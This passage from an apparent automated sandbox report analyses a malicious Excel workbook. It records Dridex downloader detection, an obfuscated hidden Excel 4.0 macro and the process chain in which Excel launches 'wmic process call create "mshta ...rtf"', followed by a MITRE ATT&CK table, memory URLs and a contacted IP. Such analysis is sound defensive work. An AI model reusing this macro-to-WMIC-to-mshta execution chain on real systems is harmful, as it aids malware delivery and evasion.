      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://wus2.contentsync.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://www.odwebp.svc.ms

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\vULADISfrveNTj.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: request-0132311.xlsbMacro extractor: Sheet: Macro1 contains: mshta
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: request-0132311.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: request-0132311.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000015.00000002.353118555.0000000002570000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: request-0132311.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 48
      Source: request-0132311.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vULADISfrveNTj.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5FBAAE12-9FD1-43FF-805E-E46E2BC0693B} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal92.troj.expl.evad.winXLSB@5/6@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: request-0132311.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: request-0132311.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: request-0132311.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: vuladisfrventj.rtf
      Source: unknownProcess created: cmd line: vuladisfrventj.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting4Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Scripting4Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery14Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
        high
        https://login.microsoftonline.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
          high
          https://shell.suite.office.com:1443DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
              high
              https://autodiscover-s.outlook.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                high
                https://roaming.edog.DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                • URL Reputation: safe
                unknown
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                  high
                  https://cdn.entity.DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                        high
                        https://powerlift.acompli.netDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                          high
                          https://cortana.aiDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                    high
                                    https://api.aadrm.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                          high
                                          https://cr.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                            high
                                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://portal.office.com/account/?ref=ClientMeControlDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                              high
                                              https://graph.ppe.windows.netDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.aadrm.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                          high
                                                          https://dev0-api.acompli.net/autodetectDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.msDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplateDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.netDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                        high
                                                                                        https://outlook.office365.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/initDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistoryDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.aiDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ovisualuiapp.azurewebsites.net/pbiagave/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    136.144.181.174
                                                                                                                                                    unknownNetherlands
                                                                                                                                                    20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:528517
                                                                                                                                                    Start date:25.11.2021
                                                                                                                                                    Start time:12:45:33
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 12s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
